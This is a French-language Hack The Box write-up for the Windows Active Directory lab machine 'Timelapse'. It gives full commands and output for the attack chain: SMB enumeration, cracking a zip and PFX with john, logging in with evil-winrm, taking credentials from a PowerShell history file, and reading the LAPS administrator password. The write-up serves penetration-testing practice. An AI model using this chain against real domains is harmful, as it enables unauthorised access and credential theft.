![[FR] [HTB] Timelapse windows write-up](https://cdn.hashnode.com/res/hashnode/image/upload/v1651866143500/E_pYPNqta.jpg?w=1600&h=840&fit=crop&crop=entropy&auto=compress,format&format=webp)
Énumération
Tout d'abord je vais commencer avec plusieurs scansnmap
┌──(kali㉿kali)-[~]
└─$ nmap -A -sV -sC -Pn 10.10.11.152
Starting Nmap 7.92 ( https://nmap.org ) at 2022-05-06 11:47 EDT
Nmap scan report for 10.10.11.152
Host is up (0.041s latency).
Not shown: 991 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2022-05-06 23:48:10Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: timelapse.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: 8h00m01s
| smb2-time:
| date: 2022-05-06T23:48:14
|_ start_date: N/A
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled and required
Je continue avec les ports UPD
┌──(root💀kali)-[~]
└─# nmap -sU -v 10.10.11.152 -T 4
Starting Nmap 7.92 ( https://nmap.org ) at 2022-05-06 11:48 EDT
Initiating Ping Scan at 11:48
Scanning 10.10.11.152 [4 ports]
Completed Ping Scan at 11:48, 0.11s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 11:48
Completed Parallel DNS resolution of 1 host. at 11:48, 0.01s elapsed
Initiating UDP Scan at 11:48
Scanning 10.10.11.152 [1000 ports]
Discovered open port 123/udp on 10.10.11.152
Discovered open port 389/udp on 10.10.11.152
Completed UDP Scan at 11:48, 17.00s elapsed (1000 total ports)
Nmap scan report for 10.10.11.152
Host is up (0.036s latency).
Not shown: 998 open|filtered udp ports (no-response)
PORT STATE SERVICE
123/udp open ntp
389/udp open ldap
et finalement je scan tout les ports
┌──(kali㉿kali)-[~]
└─$ nmap -p- -Pn -T4 10.10.11.152 130 ⨯
Starting Nmap 7.92 ( https://nmap.org ) at 2022-05-06 12:05 EDT
Nmap scan report for 10.10.11.152
Host is up (0.039s latency).
Not shown: 65519 filtered tcp ports (no-response)
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
5986/tcp open wsmans
9389/tcp open adws
49667/tcp open unknown
49673/tcp open unknown
49674/tcp open unknown
49696/tcp open unknown
63508/tcp open unknown
On peut déjà voir que c'est un AD avec le port 88 qui a kerberos-sec
et le port 89 sur ldap
SAMBA
Je vais donc me connecter avec samba :
┌──(root💀kali)-[~]
└─# smbclient -L //10.10.11.152/ -N
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
Shares Disk
SYSVOL Disk Logon server share
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.11.152 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
┌──(root💀kali)-[~]
└─# smbclient -L //10.10.11.152/Shares -N
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
Shares Disk
SYSVOL Disk Logon server share
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.11.152 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
┌──(root💀kali)-[~]
└─# smbclient //10.10.11.152/Shares
Enter WORKGROUP\root's password:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Mon Oct 25 11:39:15 2021
.. D 0 Mon Oct 25 11:39:15 2021
Dev D 0 Mon Oct 25 15:40:06 2021
HelpDesk D 0 Mon Oct 25 11:48:42 2021
6367231 blocks of size 4096. 2141886 blocks available
smb: \> cd Dev
smb: \Dev\> ls
. D 0 Mon Oct 25 15:40:06 2021
.. D 0 Mon Oct 25 15:40:06 2021
winrm_backup.zip A 2611 Mon Oct 25 11:46:42 2021
6367231 blocks of size 4096. 2144130 blocks available
smb: \Dev\> get winrm_backup.zip
getting file \Dev\winrm_backup.zip of size 2611 as winrm_backup.zip (8.0 KiloBytes/sec) (average 8.0 KiloBytes/sec)
et récupérer un fichier plutôt intéressant "winrm_backup.zip"
┌──(root💀kali)-[~]
└─# unzip winrm_backup.zip 2 ⨯
Archive: winrm_backup.zip
[winrm_backup.zip] legacyy_dev_auth.pfx password:
mais il est protégé par un mot de passe on le crack assez facilement avec john et rockyou :
┌──(root💀kali)-[~]
└─# zip2john winrm_backup.zip > hash.txt 82 ⨯
ver 2.0 efh 5455 efh 7875 winrm_backup.zip/legacyy_dev_auth.pfx PKZIP Encr: TS_chk, cmplen=2405, decmplen=2555, crc=12EC5683 ts=72AA cs=72aa type=8
┌──(root💀kali)-[~]
└─# john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 3 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
supremelegacy (winrm_backup.zip/legacyy_dev_auth.pfx)
1g 0:00:00:00 DONE (2022-05-06 15:39) 1.639g/s 5690Kp/s 5690Kc/s 5690KC/s surkerior..superrbd
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
on fois dézippé on y trouver une fichier sous format fpx
┌──(root💀kali)-[~]
└─# file legacyy_dev_auth.pfx
legacyy_dev_auth.pfx: data
en essayant d'y export le private key un nouveau mot de passe est demandé, pas le même que le précedant
┌──(root💀kali)-[~]
└─# openssl pkcs12 -in legacyy_dev_auth.pfx -nocerts -out priv-key.pem -nodes 1 ⨯
Enter Import Password:
Mac verify error: invalid password?
on y trouve donc le mot de passe qui va pouvoir me permettre d'extract les private key
┌──(root💀kali)-[~]
└─# pfx2john legacyy_dev_auth.pfx > hash2.txt 1 ⨯
┌──(root💀kali)-[~]
└─# john --wordlist=/usr/share/wordlists/rockyou.txt hash2.txt
Using default input encoding: UTF-8
Loaded 1 password hash (pfx, (.pfx, .p12) [PKCS#12 PBE (SHA1/SHA2) 256/256 AVX2 8x])
Cost 1 (iteration count) is 2000 for all loaded hashes
Cost 2 (mac-type [1:SHA1 224:SHA224 256:SHA256 384:SHA384 512:SHA512]) is 1 for all loaded hashes
Will run 3 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
thuglegacy (legacyy_dev_auth.pfx)
1g 0:00:01:02 DONE (2022-05-06 15:44) 0.01597g/s 51621p/s 51621c/s 51621C/s thugways..thugers1
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
j'export la private key et le certificat SSL :
openssl pkcs12 -in legacyy_dev_auth.pfx -nocerts -out priv-key.pem -nodes
openssl pkcs12 -in legacyy_dev_auth.pfx -nokeys -out certificate.pem
et je copie chacun dans deux fichiers key et certificate Ensuite je vais utiliser evil-winrm pour me connecter via SSL
┌──(root💀kali)-[~]
└─# evil-winrm -S -k key -c certificate -i 10.10.11.152
Evil-WinRM shell v3.3
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Warning: SSL enabled
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\legacyy\Documents> whoami
timelapse\legacyy
*Evil-WinRM* PS C:\Users\legacyy\Documents>
on trouve le user.txt dans le bureau
Privesc
je check mes privilèges et les utilisateurs sur le serveur
*Evil-WinRM* PS C:\Users\legacyy\Desktop> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
*Evil-WinRM* PS C:\Users\legacyy\Desktop> ls C:\USERS\
Directory: C:\USERS
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 10/23/2021 11:27 AM Administrator
d----- 10/25/2021 8:22 AM legacyy
d-r--- 10/23/2021 11:27 AM Public
d----- 10/25/2021 12:23 PM svc_deploy
d----- 2/23/2022 5:45 PM TRX
jusqu'a la rien de spécial, néanmoins en lançant winpeas on remarque
Directory of C:\Users\legacyy\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine
03/04/2022 12:46 AM 434 ConsoleHost_history.txt
1 File(s) 434 bytes
0 Dir(s) 9,216,249,856 bytes free
un .txt de l'historique des commandes
*Evil-WinRM* PS C:\Users\legacyy\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine> cat ConsoleHost_history.txt
whoami
ipconfig /all
netstat -ano |select-string LIST
$so = New-PSSessionOption -SkipCACheck -SkipCNCheck -SkipRevocationCheck
$p = ConvertTo-SecureString 'E3R$Q62^12p7PLlC%KWaxuaV' -AsPlainText -Force
$c = New-Object System.Management.Automation.PSCredential ('svc_deploy', $p)
invoke-command -computername localhost -credential $c -port 5986 -usessl -
SessionOption $so -scriptblock {whoami}
get-aduser -filter * -properties *
exit
on va donc réutiliser ces commandes ->
*Evil-WinRM* PS C:\USERS> $so = New-PSSessionOption -SkipCACheck -SkipCNCheck -SkipRevocationCheck
*Evil-WinRM* PS C:\USERS> $p = ConvertTo-SecureString 'E3R$Q62^12p7PLlC%KWaxuaV' -AsPlainText -Force
*Evil-WinRM* PS C:\USERS> $c = New-Object System.Management.Automation.PSCredential ('svc_deploy', $p)
de la on peut check si l'on est bien l'user "svc_deploy" via la commande et regarder ses privilèges
*Evil-WinRM* PS C:\USERS> invoke-command -computername localhost -credential $c -port 5986 -usessl -SessionOption $so -scriptblock {whoami}
timelapse\svc_deploy
*Evil-WinRM* PS C:\USERS> invoke-command -computername localhost -credential $c -port 5986 -usessl -SessionOption $so -scriptblock {whoami /priv}
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
en regardant le groupe auquel il appartient l'on voit qu'il fait partie des LAPS_readers, ce qui va nous servir et get le mot de passe admin
*Evil-WinRM* PS C:\USERS> invoke-command -computername localhost -credential $c -port 5986 -usessl -SessionOption $so -scriptblock {net user svc_deploy}
User name svc_deploy
Full Name svc_deploy
Comment
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never
Password last set 10/25/2021 12:12:37 PM
Password expires Never
Password changeable 10/26/2021 12:12:37 PM
Password required Yes
User may change password Yes
Workstations allowed All
Logon script
User profile
Home directory
Last logon 5/6/2022 9:40:48 PM
Logon hours allowed All
Local Group Memberships *Remote Management Use
Global Group memberships *LAPS_Readers *Domain Users
The command completed successfully.
- Pivoting
on va donc check les mdp admin avec Get-ADComputer avec le filtre de propriété ms-Mcs-AdmPwd
*Evil-WinRM* PS C:\USERS> invoke-command -computername localhost -credential $c -port 5986 -usessl -SessionOption $so -scriptblock {Get-ADComputer -Filter * -Properties ms-Mcs-AdmPwd, ms-Mcs-AdmPwdExpirationTime}
PSComputerName : localhost
RunspaceId : 20530fed-0044-4307-a820-94ca442c0fb7
DistinguishedName : CN=DC01,OU=Domain Controllers,DC=timelapse,DC=htb
DNSHostName : dc01.timelapse.htb
Enabled : True
ms-Mcs-AdmPwd : }3}fr01+C3#2-V/-K61230fd
ms-Mcs-AdmPwdExpirationTime : 132967864456026232
Name : DC01
ObjectClass : computer
ObjectGUID : 6e10b102-6936-41aa-bb98-bed624c9b98f
SamAccountName : DC01$
SID : S-1-5-21-671920749-559770252-3318990721-1000
UserPrincipalName :
PSComputerName : localhost
RunspaceId : 20530fed-0044-4307-a820-94ca442c0fb7
DistinguishedName : CN=DB01,OU=Database,OU=Servers,DC=timelapse,DC=htb
DNSHostName :
Enabled : True
Name : DB01
ObjectClass : computer
ObjectGUID : d38b3265-230f-47ae-bdcd-f7153da7659d
SamAccountName : DB01$
SID : S-1-5-21-671920749-559770252-3318990721-1606
UserPrincipalName :
PSComputerName : localhost
RunspaceId : 20530fed-0044-4307-a820-94ca442c0fb7
DistinguishedName : CN=WEB01,OU=Web,OU=Servers,DC=timelapse,DC=htb
DNSHostName :
Enabled : True
Name : WEB01
ObjectClass : computer
ObjectGUID : 897c7cfe-ba15-4181-8f2c-a74f88952683
SamAccountName : WEB01$
SID : S-1-5-21-671920749-559770252-3318990721-1607
UserPrincipalName :
PSComputerName : localhost
RunspaceId : 20530fed-0044-4307-a820-94ca442c0fb7
DistinguishedName : CN=DEV01,OU=Dev,OU=Servers,DC=timelapse,DC=htb
DNSHostName :
Enabled : True
Name : DEV01
ObjectClass : computer
ObjectGUID : 02dc961a-7a60-4ec0-a151-0472768814ca
SamAccountName : DEV01$
SID : S-1-5-21-671920749-559770252-3318990721-1608
UserPrincipalName :
On a donc le mot de passe admin : "}3}fr01+C3#2-V/-K61230fd" pour l'user "DC01$" soit l'admin On va se connecter avec une nouvelle session Evil-winrm ->
┌──(kali㉿kali)-[~/Desktop]
└─$ evil-winrm -i 10.10.11.152 -u 'Administrator' -p '}3}fr01+C3#2-V/-K61230fd' -S
Evil-WinRM shell v3.3
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Warning: SSL enabled
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents>
en faisaint whoami /priv on voit bien qu'on à tous les privilèges et qu'on est root